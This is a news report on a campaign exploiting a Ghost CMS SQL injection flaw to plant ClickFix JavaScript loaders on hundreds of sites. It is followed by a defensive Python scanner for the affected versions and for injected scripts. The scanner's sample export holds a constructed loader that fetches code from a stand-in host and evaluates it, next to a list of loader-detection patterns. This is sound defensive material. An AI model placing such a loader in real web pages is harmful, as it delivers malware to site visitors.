
A large-scale campaign is exploiting a critical SQL injection vulnerability (CVE-2026-26980) in Ghost CMS to inject malicious JavaScript code that triggers ClickFix attack flows.
The campaign was discovered by XLab threat intelligence researchers at Chinese cybersecurity firm Qianxin, who confirmed impact on more than 700 domains, including university portals, AI/SaaS companies, media outlets, fintech firms, security sites, and personal blogs.
According to the researchers, threat actors planted malicious code on the websites of Harvard University, Oxford University, Auburn University, and DuckDuckGo.

Source: XLab
CVE-2026-26980 affects Ghost 3.24.0 through 6.19.0 and allows unauthenticated attackers to read arbitrary data from the website database, including the admin API keys.
This key provides administrative access to users, articles, and themes, and can be used to modify article pages.
Although the fix for the issue was released on February 19 in Ghost CMS version 6.19.1, many sites failed to install the security update.
SentinelOne published details on February 27 about CVE-2026-26980 being exploited in attacks and how incidents can be detected. The researchers observed at least two distinct activity clusters targeting vulnerable Ghost sites, sometimes re-infecting the same domains with different scripts after cleanup, or one cluster removing the other's script to inject its own.

Source: XLab
Attack chain
The attacks that XLab observed begin by exploiting CVE-2026-26980 to steal the admin API keys, and then use the elevated rights to inject malicious JavaScript into articles.
The JavaScript code is a lightweight loader that fetches second-stage code from the attacker's infrastructure; the second stage is essentially a cloaking script that fingerprints visitors to determine whether they qualify as targets.
Visitors passing the check are served a fake Cloudflare prompt loaded via an iframe on top of the article page, which contains the ClickFix lure.

Source: XLab
The page instructs victims to verify that they are human by pasting a supplied command into their Windows command prompt, which drops a payload on their systems.
XLab has observed multiple payloads being used in these attacks, including DLL loaders, JavaScript droppers, and an Electron-based malware sample named UtilifySetup.exe.
Source: XLab
Mitigating the risk
The most important course of action for Ghost CMS website administrators is to upgrade to version 6.19.1 or later and rotate all keys used previously, as they may have been exposed.
XLab provided a list of indicators of compromise (IoCs), including the injected scripts, so a thorough review of affected websites is required to locate and remove them.
The researchers recommend that website owners retain at least 30 days of admin API call logs to enable a reliable retrospective investigation.
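The two checks an administrator needs after reading the attack chain and the mitigation advice above are a version test against the affected range and a sweep of article HTML for injected loaders. The script below is an added example written for this article; it is not code from XLab, SentinelOne, or the Ghost project. It assumes the affected range stated above (3.24.0 through 6.19.0, fixed in 6.19.1), that article HTML is available in the `html` field of each post in a Ghost export (`db[0].data.posts[]`) or from the Content API, and that the operator supplies the hostnames that legitimately serve scripts for the site. The sample export, the `.invalid` hostnames and the loader body in it are constructed for the demonstration and are not indicators from the campaign.

```python
"""Check a Ghost version against the CVE-2026-26980 affected range and scan
post HTML for injected script loaders and iframes.

Added example for this article, not XLab/SentinelOne/Ghost code. Assumes the
Ghost export layout db[0].data.posts[].html; sample data below is constructed.
"""
import json
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

AFFECTED_MIN = (3, 24, 0)   # first affected release named in the advisory
FIXED = (6, 19, 1)          # first fixed release


def parse_version(v: str) -> tuple:
    """'v6.19.0-rc.1' -> (6, 19, 0); missing components are treated as 0."""
    core = v.strip().lstrip("v").split("-")[0].split("+")[0]
    nums = [int(p) for p in core.split(".")[:3]]
    while len(nums) < 3:
        nums.append(0)
    return tuple(nums)


def is_vulnerable_version(v: str) -> bool:
    """True for 3.24.0 <= version < 6.19.1."""
    return AFFECTED_MIN <= parse_version(v) < FIXED


# Inline-script traits of a second-stage loader: fetch/XHR a remote script,
# decode a blob, evaluate it, or append a new <script> element.
LOADER_PATTERNS = (
    re.compile(r"\bfetch\s*\(", re.I),
    re.compile(r"XMLHttpRequest", re.I),
    re.compile(r"createElement\s*\(\s*['\"]script['\"]", re.I),
    re.compile(r"\beval\s*\(", re.I),
    re.compile(r"\batob\s*\(", re.I),
)


class _ScriptCollector(HTMLParser):
    """Collect external script/iframe sources and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []      # (tag, src)
        self.inline = []        # inline <script> bodies
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            if a.get("src"):
                self.external.append(("script", a["src"]))
            else:
                self._in_script, self._buf = True, []
        elif tag == "iframe" and a.get("src"):
            self.external.append(("iframe", a["src"]))

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def find_injections(post_html: str, allowed_hosts: set) -> list:
    """Return (tag, reason, detail) findings: off-allowlist external sources
    and inline scripts that look like loaders. Relative URLs are same-site."""
    p = _ScriptCollector()
    p.feed(post_html)
    p.close()
    findings = []
    for tag, src in p.external:
        host = urlparse(src).hostname          # None for relative paths
        if host and host.lower() not in allowed_hosts:
            findings.append((tag, "external", src))
    for body in p.inline:
        if any(pat.search(body) for pat in LOADER_PATTERNS):
            findings.append(("script", "inline-loader", body.strip()[:80]))
    return findings


def scan_export(export_json: str, allowed_hosts: set) -> dict:
    """Map post slug -> findings for every post with suspicious content."""
    posts = json.loads(export_json)["db"][0]["data"]["posts"]
    report = {}
    for post in posts:
        hits = find_injections(post.get("html") or "", allowed_hosts)
        if hits:
            report[post.get("slug") or post.get("id")] = hits
    return report


# Constructed sample export: one clean post, one carrying a loader (not a real IoC).
SAMPLE_EXPORT = json.dumps({"db": [{"data": {"posts": [
    {"slug": "clean-post",
     "html": '<p>Hello</p><script src="/assets/built/site.js"></script>'},
    {"slug": "infected-post",
     "html": "<p>Article body</p>"
             "<script>fetch('https://stage2.invalid/c.js').then(r=>r.text()).then(eval)</script>"
             '<script src="https://loader.invalid/a.js"></script>'},
]}}]})

if __name__ == "__main__":
    for v in ("3.23.9", "3.24.0", "6.19.0", "6.19.1"):
        print(v, "VULNERABLE" if is_vulnerable_version(v) else "not in range")
    for slug, hits in scan_export(SAMPLE_EXPORT, {"blog.example"}).items():
        print(slug)
        for h in hits:
            print("  ", h)
```

Run it against a fresh export of the site and treat every finding as something to review by hand rather than an automatic verdict: legitimate HTML cards do sometimes call `fetch`, and a host allowlist only works once it lists the CDN or analytics hosts the theme genuinely uses. Ghost also lets an admin set site-wide header and footer code injection in settings; that field is not part of article HTML, so check it separately, and rotate the admin API keys regardless of what the scan finds, since the vulnerability exposes them even where no script was ever injected.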

